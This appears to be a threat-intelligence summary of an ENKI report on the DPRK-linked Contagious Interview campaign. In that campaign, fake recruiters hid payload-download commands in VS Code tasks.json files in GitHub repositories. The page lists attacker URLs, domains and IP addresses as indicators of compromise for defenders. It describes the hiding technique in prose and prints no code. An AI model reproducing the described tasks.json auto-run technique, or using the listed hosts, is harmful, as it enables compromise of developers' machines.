Contagious Interview Campaign Abusing VSCode Distributed on Github

2026-02-26 ENKI

https://www.enki.co.kr/en/media-center/blog/contagious-interview-campaign-abusing-vscode-distributed-on-github

Thumbnail for Contagious Interview Campaign Abusing VSCode Distributed on Github

ENKI attributes GitHub-hosted malware abusing Visual Studio Code automation features to the DPRK-nexus Contagious Interview campaign targeting developers. Actors posed as recruiters, Web3 developers, and fictitious companies, then embedded OS-specific download commands in .vscode/tasks.json so payloads could execute when victims opened repositories in VS Code. The chain staged BeaverTail, InvisibleFerret, or OtterCookie through C2-hosted scripts, with some malicious commands hidden by whitespace padding and code artifacts suggesting LLM-assisted development. The report lists attacker GitHub personas, suspicious repositories, typosquatted infrastructure such as koinos[.]us, and C2-derived artifacts that help defenders hunt repository-based developer compromise.

Indicators of Compromise

Type Value First Seen Last Seen
IPv4 45.59.163.23 2026-01-21 2026-04-01
EMAIL [email protected] 2026-02-26 2026-02-26
URL https://vscode-helper171-ruby.v… 2026-02-26 2026-02-26
URL https://www.vscodeconfig.com/se… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://codeviewer-three.vercel… 2026-02-26 2026-02-26
URL https://vscode-settings-config.… 2026-02-26 2026-02-26
URL https://vscode-load-config.verc… 2026-02-26 2026-02-26
URL https://vscodesettings03kui.ver… 2026-02-26 2026-02-26
URL https://www.vscodeconfig.com/se… 2026-02-26 2026-02-26
URL https://codeviewer-three.vercel… 2026-02-26 2026-02-26
URL https://www.vscodeconfig.com/se… 2026-02-26 2026-02-26
URL https://codeviewer-three.vercel… 2026-02-26 2026-02-26
URL https://vscode-settings-config.… 2026-02-26 2026-02-26
URL https://vscode-helper171-ruby.v… 2026-02-26 2026-02-26
URL https://codeviewer-three.vercel… 2026-02-26 2026-02-26
URL https://vscode-toolkit-bootstra… 2026-02-26 2026-02-26
URL https://vscode-helper171-ruby.v… 2026-02-26 2026-02-26
URL https://vscode-helper171-ruby.v… 2026-02-26 2026-02-26
URL https://vscode-settings-config.… 2026-02-26 2026-02-26
URL https://vscode-load.onrender.co… 2026-02-26 2026-02-26
URL https://codeviewer-three.vercel… 2026-02-26 2026-02-26
URL https://codeviewer-three.vercel… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-helper171-ruby.v… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-load-config.verc… 2026-02-26 2026-02-26
URL https://www.vscodeconfig.com/se… 2026-02-26 2026-02-26
URL https://vscode-load.onrender.co… 2026-02-26 2026-02-26
URL https://vscode-settings-config.… 2026-02-26 2026-02-26
URL https://vscode-helper171.vercel… 2026-02-26 2026-02-26
URL https://vscode-settings-config.… 2026-02-26 2026-02-26
URL https://vscode-settings-config.… 2026-02-26 2026-02-26
URL https://codeviewer-three.vercel… 2026-02-26 2026-02-26
URL https://vscodesettingstask.verc… 2026-02-26 2026-02-26
URL https://codeviewer-three.vercel… 2026-02-26 2026-02-26
URL https://vscode-helper-132.verce… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-load.onrender.co… 2026-02-26 2026-02-26
URL https://vscode-load-config.verc… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-helper171-ruby.v… 2026-02-26 2026-02-26
URL https://vscode-load-config.verc… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://www.vscodeconfig.com/se… 2026-02-26 2026-02-26
URL https://vscode-settings-config.… 2026-02-26 2026-02-26
URL https://codeviewer-three.vercel… 2026-02-26 2026-02-26
URL https://vscode-helper-132.verce… 2026-02-26 2026-02-26
URL https://vscodesettingstask.verc… 2026-02-26 2026-02-26
URL https://vscode-helper171.vercel… 2026-02-26 2026-02-26
URL https://vscode-load-config.verc… 2026-02-26 2026-02-26
URL https://vscodesettings03kui.ver… 2026-02-26 2026-02-26
URL https://vscode-helper171-ruby.v… 2026-02-26 2026-02-26
URL https://www.vscodeconfig.com/se… 2026-02-26 2026-02-26
URL https://vscode-helper171.vercel… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-settings-config.… 2026-02-26 2026-02-26
URL https://vscode-helper171-ruby.v… 2026-02-26 2026-02-26
URL https://www.vscodeconfig.com/se… 2026-02-26 2026-02-26
URL https://www.vscodeconfig.com/se… 2026-02-26 2026-02-26
URL https://vscodesettingstask.verc… 2026-02-26 2026-02-26
URL https://y-lilac-sigma.vercel.ap… 2026-02-26 2026-02-26
URL https://vscode-helper171-ruby.v… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://www.vscodeconfig.com/se… 2026-02-26 2026-02-26
URL https://vscode-helper-132.verce… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-toolkit-bootstra… 2026-02-26 2026-02-26
URL https://vscode-load-config.verc… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
URL https://vscode-settings-config.… 2026-02-26 2026-02-26
URL https://veneliteus.com 2026-02-26 2026-02-26
URL https://vscodesettings03kui.ver… 2026-02-26 2026-02-26
URL https://vscode-settings-bootstr… 2026-02-26 2026-02-26
DOMAIN koinos.io 2026-02-26 2026-02-26
DOMAIN veneliteus.com 2026-02-26 2026-02-26
IPv4 66.235.11.117 2026-02-26 2026-02-26
IPv4 147.124.202.225 2026-02-26 2026-02-26
IPv4 130.65.230.100 2026-02-26 2026-02-26
IPv4 103.65.230.100 2026-02-26 2026-02-26
IPv4 216.250.251.211 2026-02-26 2026-02-26
IPv4 147.124.213.19 2026-01-21 2026-02-26
IPv4 67.203.7.205 2026-01-21 2026-02-26
IPv4 172.86.73.198 2026-01-21 2026-02-26
IPv4 38.92.47.152 2026-01-21 2026-02-26
IPv4 66.235.175.117 2026-01-21 2026-02-26
URL https://vscode-toolkit-bootstra… 2026-01-20 2026-02-26
URL https://vscodesettingstask.verc… 2026-01-20 2026-02-26
DOMAIN vscode-load.onrender.com 2026-01-20 2026-02-26
IPv4 147.124.213.232 2026-01-12 2026-02-26
IPv4 216.250.251.87 2026-01-12 2026-02-26
IPv4 45.59.163.55 2026-01-12 2026-02-26
IPv4 66.235.175.109 2025-11-13 2026-02-26

Related Actors

Related Reports

« Back